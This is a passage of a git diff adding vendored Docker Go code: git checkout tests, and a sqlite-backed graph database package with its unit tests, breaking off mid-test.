+
+func TestCloneArgsStripFragment(t *testing.T) {
+	u, _ := url.Parse("git://github.com/docker/docker#test")
+	args := cloneArgs(u, "/tmp")
+	exp := []string{"clone", "--recursive", "git://github.com/docker/docker", "/tmp"}
+	if !reflect.DeepEqual(args, exp) {
+		t.Fatalf("Expected %v, got %v", exp, args)
+	}
+}
+
+func gitGetConfig(name string) string {
+	b, err := git([]string{"config", "--get", name}...)
+	if err != nil {
+		// since we are interested in empty or non empty string,
+		// we can safely ignore the err here.
+		return ""
+	}
+	return strings.TrimSpace(string(b))
+}
+
+func TestCheckoutGit(t *testing.T) {
+	root, err := ioutil.TempDir("", "docker-build-git-checkout")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(root)
+
+	autocrlf := gitGetConfig("core.autocrlf")
+	if !(autocrlf == "true" || autocrlf == "false" ||
+		autocrlf == "input" || autocrlf == "") {
+		t.Logf("unknown core.autocrlf value: \"%s\"", autocrlf)
+	}
+	eol := "\n"
+	if autocrlf == "true" {
+		eol = "\r\n"
+	}
+
+	gitDir := filepath.Join(root, "repo")
+	_, err = git("init", gitDir)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err = gitWithinDir(gitDir, "config", "user.email", "test@docker.com"); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err = gitWithinDir(gitDir, "config", "user.name", "Docker test"); err != nil {
+		t.Fatal(err)
+	}
+
+	if err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch"), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	subDir := filepath.Join(gitDir, "subdir")
+	if err = os.Mkdir(subDir, 0755); err != nil {
+		t.Fatal(err)
+	}
+
+	if err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 5000"), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	if runtime.GOOS != "windows" {
+		if err = os.Symlink("../subdir", filepath.Join(gitDir, "parentlink")); err != nil {
+			t.Fatal(err)
+		}
+
+		if err = os.Symlink("/subdir", filepath.Join(gitDir, "absolutelink")); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	if _, err = gitWithinDir(gitDir, "add", "-A"); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err = gitWithinDir(gitDir, "commit", "-am", "First commit"); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err = gitWithinDir(gitDir, "checkout", "-b", "test"); err != nil {
+		t.Fatal(err)
+	}
+
+	if err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 3000"), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	if err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM busybox\nEXPOSE 5000"), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err = gitWithinDir(gitDir, "add", "-A"); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err = gitWithinDir(gitDir, "commit", "-am", "Branch commit"); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err = gitWithinDir(gitDir, "checkout", "master"); err != nil {
+		t.Fatal(err)
+	}
+
+	type singleCase struct {
+		frag string
+		exp  string
+		fail bool
+	}
+
+	cases := []singleCase{
+		{"", "FROM scratch", false},
+		{"master", "FROM scratch", false},
+		{":subdir", "FROM scratch" + eol + "EXPOSE 5000", false},
+		{":nosubdir", "", true},   // missing directory error
+		{":Dockerfile", "", true}, // not a directory error
+		{"master:nosubdir", "", true},
+		{"master:subdir", "FROM scratch" + eol + "EXPOSE 5000", false},
+		{"master:../subdir", "", true},
+		{"test", "FROM scratch" + eol + "EXPOSE 3000", false},
+		{"test:", "FROM scratch" + eol + "EXPOSE 3000", false},
+		{"test:subdir", "FROM busybox" + eol + "EXPOSE 5000", false},
+	}
+
+	if runtime.GOOS != "windows" {
+		// Windows GIT (2.7.1 x64) does not support parentlink/absolutelink. Sample output below
+		// 	git --work-tree .\repo --git-dir .\repo\.git add -A
+		//	error: readlink("absolutelink"): Function not implemented
+		// 	error: unable to index file absolutelink
+		// 	fatal: adding files failed
+		cases = append(cases, singleCase{frag: "master:absolutelink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false})
+		cases = append(cases, singleCase{frag: "master:parentlink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false})
+	}
+
+	for _, c := range cases {
+		r, err := checkoutGit(c.frag, gitDir)
+
+		fail := err != nil
+		if fail != c.fail {
+			t.Fatalf("Expected %v failure, error was %v\n", c.fail, err)
+		}
+		if c.fail {
+			continue
+		}
+
+		b, err := ioutil.ReadFile(filepath.Join(r, "Dockerfile"))
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		if string(b) != c.exp {
+			t.Fatalf("Expected %v, was %v\n", c.exp, string(b))
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go
new file mode 100644
index 0000000000..8e61ff3b4f
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go
@@ -0,0 +1,19 @@
+// +build cgo
+
+package graphdb
+
+import (
+	"database/sql"
+
+	_ "github.com/mattn/go-sqlite3" // registers sqlite
+)
+
+// NewSqliteConn opens a connection to a sqlite
+// database.
+func NewSqliteConn(root string) (*Database, error) {
+	conn, err := sql.Open("sqlite3", root)
+	if err != nil {
+		return nil, err
+	}
+	return NewDatabase(conn)
+}
diff --git a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go
new file mode 100644
index 0000000000..eca433fa85
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go
@@ -0,0 +1,551 @@
+package graphdb
+
+import (
+	"database/sql"
+	"fmt"
+	"path"
+	"strings"
+	"sync"
+)
+
+const (
+	createEntityTable = `
+    CREATE TABLE IF NOT EXISTS entity (
+        id text NOT NULL PRIMARY KEY
+    );`
+
+	createEdgeTable = `
+    CREATE TABLE IF NOT EXISTS edge (
+        "entity_id" text NOT NULL,
+        "parent_id" text NULL,
+        "name" text NOT NULL,
+        CONSTRAINT "parent_fk" FOREIGN KEY ("parent_id") REFERENCES "entity" ("id"),
+        CONSTRAINT "entity_fk" FOREIGN KEY ("entity_id") REFERENCES "entity" ("id")
+        );
+    `
+
+	createEdgeIndices = `
+    CREATE UNIQUE INDEX IF NOT EXISTS "name_parent_ix" ON "edge" (parent_id, name);
+    `
+)
+
+// Entity with a unique id.
+type Entity struct {
+	id string
+}
+
+// An Edge connects two entities together.
+type Edge struct {
+	EntityID string
+	Name     string
+	ParentID string
+}
+
+// Entities stores the list of entities.
+type Entities map[string]*Entity
+
+// Edges stores the relationships between entities.
+type Edges []*Edge
+
+// WalkFunc is a function invoked to process an individual entity.
+type WalkFunc func(fullPath string, entity *Entity) error
+
+// Database is a graph database for storing entities and their relationships.
+type Database struct {
+	conn *sql.DB
+	mux  sync.RWMutex
+}
+
+// IsNonUniqueNameError processes the error to check if it's caused by
+// a constraint violation.
+// This is necessary because the error isn't the same across various
+// sqlite versions.
+func IsNonUniqueNameError(err error) bool {
+	str := err.Error()
+	// sqlite 3.7.17-1ubuntu1 returns:
+	// Set failure: Abort due to constraint violation: columns parent_id, name are not unique
+	if strings.HasSuffix(str, "name are not unique") {
+		return true
+	}
+	// sqlite-3.8.3-1.fc20 returns:
+	// Set failure: Abort due to constraint violation: UNIQUE constraint failed: edge.parent_id, edge.name
+	if strings.Contains(str, "UNIQUE constraint failed") && strings.Contains(str, "edge.name") {
+		return true
+	}
+	// sqlite-3.6.20-1.el6 returns:
+	// Set failure: Abort due to constraint violation: constraint failed
+	if strings.HasSuffix(str, "constraint failed") {
+		return true
+	}
+	return false
+}
+
+// NewDatabase creates a new graph database initialized with a root entity.
+func NewDatabase(conn *sql.DB) (*Database, error) {
+	if conn == nil {
+		return nil, fmt.Errorf("Database connection cannot be nil")
+	}
+	db := &Database{conn: conn}
+
+	// Create root entities
+	tx, err := conn.Begin()
+	if err != nil {
+		return nil, err
+	}
+
+	if _, err := tx.Exec(createEntityTable); err != nil {
+		return nil, err
+	}
+	if _, err := tx.Exec(createEdgeTable); err != nil {
+		return nil, err
+	}
+	if _, err := tx.Exec(createEdgeIndices); err != nil {
+		return nil, err
+	}
+
+	if _, err := tx.Exec("DELETE FROM entity where id = ?", "0"); err != nil {
+		tx.Rollback()
+		return nil, err
+	}
+
+	if _, err := tx.Exec("INSERT INTO entity (id) VALUES (?);", "0"); err != nil {
+		tx.Rollback()
+		return nil, err
+	}
+
+	if _, err := tx.Exec("DELETE FROM edge where entity_id=? and name=?", "0", "/"); err != nil {
+		tx.Rollback()
+		return nil, err
+	}
+
+	if _, err := tx.Exec("INSERT INTO edge (entity_id, name) VALUES(?,?);", "0", "/"); err != nil {
+		tx.Rollback()
+		return nil, err
+	}
+
+	if err := tx.Commit(); err != nil {
+		return nil, err
+	}
+
+	return db, nil
+}
+
+// Close the underlying connection to the database.
+func (db *Database) Close() error {
+	return db.conn.Close()
+}
+
+// Set the entity id for a given path.
+func (db *Database) Set(fullPath, id string) (*Entity, error) {
+	db.mux.Lock()
+	defer db.mux.Unlock()
+
+	tx, err := db.conn.Begin()
+	if err != nil {
+		return nil, err
+	}
+
+	var entityID string
+	if err := tx.QueryRow("SELECT id FROM entity WHERE id = ?;", id).Scan(&entityID); err != nil {
+		if err == sql.ErrNoRows {
+			if _, err := tx.Exec("INSERT INTO entity (id) VALUES(?);", id); err != nil {
+				tx.Rollback()
+				return nil, err
+			}
+		} else {
+			tx.Rollback()
+			return nil, err
+		}
+	}
+	e := &Entity{id}
+
+	parentPath, name := splitPath(fullPath)
+	if err := db.setEdge(parentPath, name, e, tx); err != nil {
+		tx.Rollback()
+		return nil, err
+	}
+
+	if err := tx.Commit(); err != nil {
+		return nil, err
+	}
+	return e, nil
+}
+
+// Exists returns true if a name already exists in the database.
+func (db *Database) Exists(name string) bool {
+	db.mux.RLock()
+	defer db.mux.RUnlock()
+
+	e, err := db.get(name)
+	if err != nil {
+		return false
+	}
+	return e != nil
+}
+
+func (db *Database) setEdge(parentPath, name string, e *Entity, tx *sql.Tx) error {
+	parent, err := db.get(parentPath)
+	if err != nil {
+		return err
+	}
+	if parent.id == e.id {
+		return fmt.Errorf("Cannot set self as child")
+	}
+
+	if _, err := tx.Exec("INSERT INTO edge (parent_id, name, entity_id) VALUES (?,?,?);", parent.id, name, e.id); err != nil {
+		return err
+	}
+	return nil
+}
+
+// RootEntity returns the root "/" entity for the database.
+func (db *Database) RootEntity() *Entity {
+	return &Entity{
+		id: "0",
+	}
+}
+
+// Get returns the entity for a given path.
+func (db *Database) Get(name string) *Entity {
+	db.mux.RLock()
+	defer db.mux.RUnlock()
+
+	e, err := db.get(name)
+	if err != nil {
+		return nil
+	}
+	return e
+}
+
+func (db *Database) get(name string) (*Entity, error) {
+	e := db.RootEntity()
+	// We always know the root name so return it if
+	// it is requested
+	if name == "/" {
+		return e, nil
+	}
+
+	parts := split(name)
+	for i := 1; i < len(parts); i++ {
+		p := parts[i]
+		if p == "" {
+			continue
+		}
+
+		next := db.child(e, p)
+		if next == nil {
+			return nil, fmt.Errorf("Cannot find child for %s", name)
+		}
+		e = next
+	}
+	return e, nil
+
+}
+
+// List all entities by from the name.
+// The key will be the full path of the entity.
+func (db *Database) List(name string, depth int) Entities {
+	db.mux.RLock()
+	defer db.mux.RUnlock()
+
+	out := Entities{}
+	e, err := db.get(name)
+	if err != nil {
+		return out
+	}
+
+	children, err := db.children(e, name, depth, nil)
+	if err != nil {
+		return out
+	}
+
+	for _, c := range children {
+		out[c.FullPath] = c.Entity
+	}
+	return out
+}
+
+// Walk through the child graph of an entity, calling walkFunc for each child entity.
+// It is safe for walkFunc to call graph functions.
+func (db *Database) Walk(name string, walkFunc WalkFunc, depth int) error {
+	children, err := db.Children(name, depth)
+	if err != nil {
+		return err
+	}
+
+	// Note: the database lock must not be held while calling walkFunc
+	for _, c := range children {
+		if err := walkFunc(c.FullPath, c.Entity); err != nil {
+			return err
+		}
+	}
+	return nil
+}
+
+// Children returns the children of the specified entity.
+func (db *Database) Children(name string, depth int) ([]WalkMeta, error) {
+	db.mux.RLock()
+	defer db.mux.RUnlock()
+
+	e, err := db.get(name)
+	if err != nil {
+		return nil, err
+	}
+
+	return db.children(e, name, depth, nil)
+}
+
+// Parents returns the parents of a specified entity.
+func (db *Database) Parents(name string) ([]string, error) {
+	db.mux.RLock()
+	defer db.mux.RUnlock()
+
+	e, err := db.get(name)
+	if err != nil {
+		return nil, err
+	}
+	return db.parents(e)
+}
+
+// Refs returns the reference count for a specified id.
+func (db *Database) Refs(id string) int {
+	db.mux.RLock()
+	defer db.mux.RUnlock()
+
+	var count int
+	if err := db.conn.QueryRow("SELECT COUNT(*) FROM edge WHERE entity_id = ?;", id).Scan(&count); err != nil {
+		return 0
+	}
+	return count
+}
+
+// RefPaths returns all the id's path references.
+func (db *Database) RefPaths(id string) Edges {
+	db.mux.RLock()
+	defer db.mux.RUnlock()
+
+	refs := Edges{}
+
+	rows, err := db.conn.Query("SELECT name, parent_id FROM edge WHERE entity_id = ?;", id)
+	if err != nil {
+		return refs
+	}
+	defer rows.Close()
+
+	for rows.Next() {
+		var name string
+		var parentID string
+		if err := rows.Scan(&name, &parentID); err != nil {
+			return refs
+		}
+		refs = append(refs, &Edge{
+			EntityID: id,
+			Name:     name,
+			ParentID: parentID,
+		})
+	}
+	return refs
+}
+
+// Delete the reference to an entity at a given path.
+func (db *Database) Delete(name string) error {
+	db.mux.Lock()
+	defer db.mux.Unlock()
+
+	if name == "/" {
+		return fmt.Errorf("Cannot delete root entity")
+	}
+
+	parentPath, n := splitPath(name)
+	parent, err := db.get(parentPath)
+	if err != nil {
+		return err
+	}
+
+	if _, err := db.conn.Exec("DELETE FROM edge WHERE parent_id = ? AND name = ?;", parent.id, n); err != nil {
+		return err
+	}
+	return nil
+}
+
+// Purge removes the entity with the specified id
+// Walk the graph to make sure all references to the entity
+// are removed and return the number of references removed
+func (db *Database) Purge(id string) (int, error) {
+	db.mux.Lock()
+	defer db.mux.Unlock()
+
+	tx, err := db.conn.Begin()
+	if err != nil {
+		return -1, err
+	}
+
+	// Delete all edges
+	rows, err := tx.Exec("DELETE FROM edge WHERE entity_id = ?;", id)
+	if err != nil {
+		tx.Rollback()
+		return -1, err
+	}
+	changes, err := rows.RowsAffected()
+	if err != nil {
+		return -1, err
+	}
+
+	// Clear who's using this id as parent
+	refs, err := tx.Exec("DELETE FROM edge WHERE parent_id = ?;", id)
+	if err != nil {
+		tx.Rollback()
+		return -1, err
+	}
+	refsCount, err := refs.RowsAffected()
+	if err != nil {
+		return -1, err
+	}
+
+	// Delete entity
+	if _, err := tx.Exec("DELETE FROM entity where id = ?;", id); err != nil {
+		tx.Rollback()
+		return -1, err
+	}
+
+	if err := tx.Commit(); err != nil {
+		return -1, err
+	}
+
+	return int(changes + refsCount), nil
+}
+
+// Rename an edge for a given path
+func (db *Database) Rename(currentName, newName string) error {
+	db.mux.Lock()
+	defer db.mux.Unlock()
+
+	parentPath, name := splitPath(currentName)
+	newParentPath, newEdgeName := splitPath(newName)
+
+	if parentPath != newParentPath {
+		return fmt.Errorf("Cannot rename when root paths do not match %s != %s", parentPath, newParentPath)
+	}
+
+	parent, err := db.get(parentPath)
+	if err != nil {
+		return err
+	}
+
+	rows, err := db.conn.Exec("UPDATE edge SET name = ? WHERE parent_id = ? AND name = ?;", newEdgeName, parent.id, name)
+	if err != nil {
+		return err
+	}
+	i, err := rows.RowsAffected()
+	if err != nil {
+		return err
+	}
+	if i == 0 {
+		return fmt.Errorf("Cannot locate edge for %s %s", parent.id, name)
+	}
+	return nil
+}
+
+// WalkMeta stores the walk metadata.
+type WalkMeta struct {
+	Parent   *Entity
+	Entity   *Entity
+	FullPath string
+	Edge     *Edge
+}
+
+func (db *Database) children(e *Entity, name string, depth int, entities []WalkMeta) ([]WalkMeta, error) {
+	if e == nil {
+		return entities, nil
+	}
+
+	rows, err := db.conn.Query("SELECT entity_id, name FROM edge where parent_id = ?;", e.id)
+	if err != nil {
+		return nil, err
+	}
+	defer rows.Close()
+
+	for rows.Next() {
+		var entityID, entityName string
+		if err := rows.Scan(&entityID, &entityName); err != nil {
+			return nil, err
+		}
+		child := &Entity{entityID}
+		edge := &Edge{
+			ParentID: e.id,
+			Name:     entityName,
+			EntityID: child.id,
+		}
+
+		meta := WalkMeta{
+			Parent:   e,
+			Entity:   child,
+			FullPath: path.Join(name, edge.Name),
+			Edge:     edge,
+		}
+
+		entities = append(entities, meta)
+
+		if depth != 0 {
+			nDepth := depth
+			if depth != -1 {
+				nDepth--
+			}
+			entities, err = db.children(child, meta.FullPath, nDepth, entities)
+			if err != nil {
+				return nil, err
+			}
+		}
+	}
+
+	return entities, nil
+}
+
+func (db *Database) parents(e *Entity) (parents []string, err error) {
+	if e == nil {
+		return parents, nil
+	}
+
+	rows, err := db.conn.Query("SELECT parent_id FROM edge where entity_id = ?;", e.id)
+	if err != nil {
+		return nil, err
+	}
+	defer rows.Close()
+
+	for rows.Next() {
+		var parentID string
+		if err := rows.Scan(&parentID); err != nil {
+			return nil, err
+		}
+		parents = append(parents, parentID)
+	}
+
+	return parents, nil
+}
+
+// Return the entity based on the parent path and name.
+func (db *Database) child(parent *Entity, name string) *Entity {
+	var id string
+	if err := db.conn.QueryRow("SELECT entity_id FROM edge WHERE parent_id = ? AND name = ?;", parent.id, name).Scan(&id); err != nil {
+		return nil
+	}
+	return &Entity{id}
+}
+
+// ID returns the id used to reference this entity.
+func (e *Entity) ID() string {
+	return e.id
+}
+
+// Paths returns the paths sorted by depth.
+func (e Entities) Paths() []string {
+	out := make([]string, len(e))
+	var i int
+	for k := range e {
+		out[i] = k
+		i++
+	}
+	sortByDepth(out)
+
+	return out
+}
diff --git a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go
new file mode 100644
index 0000000000..f0fb074b4d
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go
@@ -0,0 +1,721 @@
+package graphdb
+
+import (
+	"database/sql"
+	"fmt"
+	"os"
+	"path"
+	"runtime"
+	"strconv"
+	"testing"
+
+	_ "github.com/mattn/go-sqlite3"
+)
+
+func newTestDb(t *testing.T) (*Database, string) {
+	p := path.Join(os.TempDir(), "sqlite.db")
+	conn, err := sql.Open("sqlite3", p)
+	db, err := NewDatabase(conn)
+	if err != nil {
+		t.Fatal(err)
+	}
+	return db, p
+}
+
+func destroyTestDb(dbPath string) {
+	os.Remove(dbPath)
+}
+
+func TestNewDatabase(t *testing.T) {
+	db, dbpath := newTestDb(t)
+	if db == nil {
+		t.Fatal("Database should not be nil")
+	}
+	db.Close()
+	defer destroyTestDb(dbpath)
+}
+
+func TestCreateRootEntity(t *testing.T) {
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+	root := db.RootEntity()
+	if root == nil {
+		t.Fatal("Root entity should not be nil")
+	}
+}
+
+func TestGetRootEntity(t *testing.T) {
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	e := db.Get("/")
+	if e == nil {
+		t.Fatal("Entity should not be nil")
+	}
+	if e.ID() != "0" {
+		t.Fatalf("Entity id should be 0, got %s", e.ID())
+	}
+}
+
+func TestSetEntityWithDifferentName(t *testing.T) {
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	db.Set("/test", "1")
+	if _, err := db.Set("/other", "1"); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestSetDuplicateEntity(t *testing.T) {
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	if _, err := db.Set("/foo", "42"); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/foo", "43"); err == nil {
+		t.Fatalf("Creating an entry with a duplicate path did not cause an error")
+	}
+}
+
+func TestCreateChild(t *testing.T) {
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	child, err := db.Set("/db", "1")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if child == nil {
+		t.Fatal("Child should not be nil")
+	}
+	if child.ID() != "1" {
+		t.Fail()
+	}
+}
+
+func TestParents(t *testing.T) {
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	for i := 1; i < 6; i++ {
+		a := strconv.Itoa(i)
+		if _, err := db.Set("/"+a, a); err != nil {
+			t.Fatal(err)
+		}
+	}
+
+	for i := 6; i < 11; i++ {
+		a := strconv.Itoa(i)
+		p := strconv.Itoa(i - 5)
+
+		key := fmt.Sprintf("/%s/%s", p, a)
+
+		if _, err := db.Set(key, a); err != nil {
+			t.Fatal(err)
+		}
+
+		parents, err := db.Parents(key)
+		if err != nil {
+			t.Fatal(err)
+		}
+
+		if len(parents) != 1 {
+			t.Fatalf("Expected 1 entry for %s got %d", key, len(parents))
+		}
+
+		if parents[0] != p {
+			t.Fatalf("ID %s received, %s expected", parents[0], p)
+		}
+	}
+}
+
+func TestChildren(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	str := "/"
+	for i := 1; i < 6; i++ {
+		a := strconv.Itoa(i)
+		if _, err := db.Set(str+a, a); err != nil {
+			t.Fatal(err)
+		}
+
+		str = str + a + "/"
+	}
+
+	str = "/"
+	for i := 10; i < 30; i++ { // 20 entities
+		a := strconv.Itoa(i)
+		if _, err := db.Set(str+a, a); err != nil {
+			t.Fatal(err)
+		}
+
+		str = str + a + "/"
+	}
+	entries, err := db.Children("/", 5)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(entries) != 11 {
+		t.Fatalf("Expect 11 entries for / got %d", len(entries))
+	}
+
+	entries, err = db.Children("/", 20)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if len(entries) != 25 {
+		t.Fatalf("Expect 25 entries for / got %d", len(entries))
+	}
+}
+
+func TestListAllRootChildren(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	for i := 1; i < 6; i++ {
+		a := strconv.Itoa(i)
+		if _, err := db.Set("/"+a, a); err != nil {
+			t.Fatal(err)
+		}
+	}
+	entries := db.List("/", -1)
+	if len(entries) != 5 {
+		t.Fatalf("Expect 5 entries for / got %d", len(entries))
+	}
+}
+
+func TestListAllSubChildren(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	_, err := db.Set("/webapp", "1")
+	if err != nil {
+		t.Fatal(err)
+	}
+	child2, err := db.Set("/db", "2")
+	if err != nil {
+		t.Fatal(err)
+	}
+	child4, err := db.Set("/logs", "4")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/db/logs", child4.ID()); err != nil {
+		t.Fatal(err)
+	}
+
+	child3, err := db.Set("/sentry", "3")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/webapp/db", child2.ID()); err != nil {
+		t.Fatal(err)
+	}
+
+	entries := db.List("/webapp", 1)
+	if len(entries) != 3 {
+		t.Fatalf("Expect 3 entries for / got %d", len(entries))
+	}
+
+	entries = db.List("/webapp", 0)
+	if len(entries) != 2 {
+		t.Fatalf("Expect 2 entries for / got %d", len(entries))
+	}
+}
+
+func TestAddSelfAsChild(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	child, err := db.Set("/test", "1")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/test/other", child.ID()); err == nil {
+		t.Fatal("Error should not be nil")
+	}
+}
+
+func TestAddChildToNonExistentRoot(t *testing.T) {
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	if _, err := db.Set("/myapp", "1"); err != nil {
+		t.Fatal(err)
+	}
+
+	if _, err := db.Set("/myapp/proxy/db", "2"); err == nil {
+		t.Fatal("Error should not be nil")
+	}
+}
+
+func TestWalkAll(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+	_, err := db.Set("/webapp", "1")
+	if err != nil {
+		t.Fatal(err)
+	}
+	child2, err := db.Set("/db", "2")
+	if err != nil {
+		t.Fatal(err)
+	}
+	child4, err := db.Set("/db/logs", "4")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/webapp/logs", child4.ID()); err != nil {
+		t.Fatal(err)
+	}
+
+	child3, err := db.Set("/sentry", "3")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/webapp/db", child2.ID()); err != nil {
+		t.Fatal(err)
+	}
+
+	child5, err := db.Set("/gograph", "5")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil {
+		t.Fatal(err)
+	}
+
+	if err := db.Walk("/", func(p string, e *Entity) error {
+		t.Logf("Path: %s Entity: %s", p, e.ID())
+		return nil
+	}, -1); err != nil {
+		t.Fatal(err)
+	}
+}
+
+func TestGetEntityByPath(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+	_, err := db.Set("/webapp", "1")
+	if err != nil {
+		t.Fatal(err)
+	}
+	child2, err := db.Set("/db", "2")
+	if err != nil {
+		t.Fatal(err)
+	}
+	child4, err := db.Set("/logs", "4")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/db/logs", child4.ID()); err != nil {
+		t.Fatal(err)
+	}
+
+	child3, err := db.Set("/sentry", "3")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/webapp/db", child2.ID()); err != nil {
+		t.Fatal(err)
+	}
+
+	child5, err := db.Set("/gograph", "5")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil {
+		t.Fatal(err)
+	}
+
+	entity := db.Get("/webapp/db/logs")
+	if entity == nil {
+		t.Fatal("Entity should not be nil")
+	}
+	if entity.ID() != "4" {
+		t.Fatalf("Expected to get entity with id 4, got %s", entity.ID())
+	}
+}
+
+func TestEnitiesPaths(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+	_, err := db.Set("/webapp", "1")
+	if err != nil {
+		t.Fatal(err)
+	}
+	child2, err := db.Set("/db", "2")
+	if err != nil {
+		t.Fatal(err)
+	}
+	child4, err := db.Set("/logs", "4")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/db/logs", child4.ID()); err != nil {
+		t.Fatal(err)
+	}
+
+	child3, err := db.Set("/sentry", "3")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/webapp/db", child2.ID()); err != nil {
+		t.Fatal(err)
+	}
+
+	child5, err := db.Set("/gograph", "5")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil {
+		t.Fatal(err)
+	}
+
+	out := db.List("/", -1)
+	for _, p := range out.Paths() {
+		t.Log(p)
+	}
+}
+
+func TestDeleteRootEntity(t *testing.T) {
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+
+	if err := db.Delete("/"); err == nil {
+		t.Fatal("Error should not be nil")
+	}
+}
+
+func TestDeleteEntity(t *testing.T) {
+	// TODO Windows: Port this test
+	if runtime.GOOS == "windows" {
+		t.Skip("Needs porting to Windows")
+	}
+	db, dbpath := newTestDb(t)
+	defer destroyTestDb(dbpath)
+	_, err := db.Set("/webapp", "1")
+	if err != nil {
+		t.Fatal(err)
+	}
+	child2, err := db.Set("/db", "2")
+	if err != nil {
+		t.Fatal(err)
+	}
+	child4, err := db.Set("/logs", "4")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/db/logs", child4.ID()); err != nil {
+		t.Fatal(err)
+	}
+
+	child3, err := db.Set("/sentry", "3")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil {
+		t.Fatal(err)
+	}
+	if _, err := db.Set("/webapp/db", child2.ID()); err != nil {
+		t.Fatal(err)
+	}
+
+	child5, err := db.Set("/gograph", "5")
+	if err != nil {
+		t.Fatal(err)
+	}
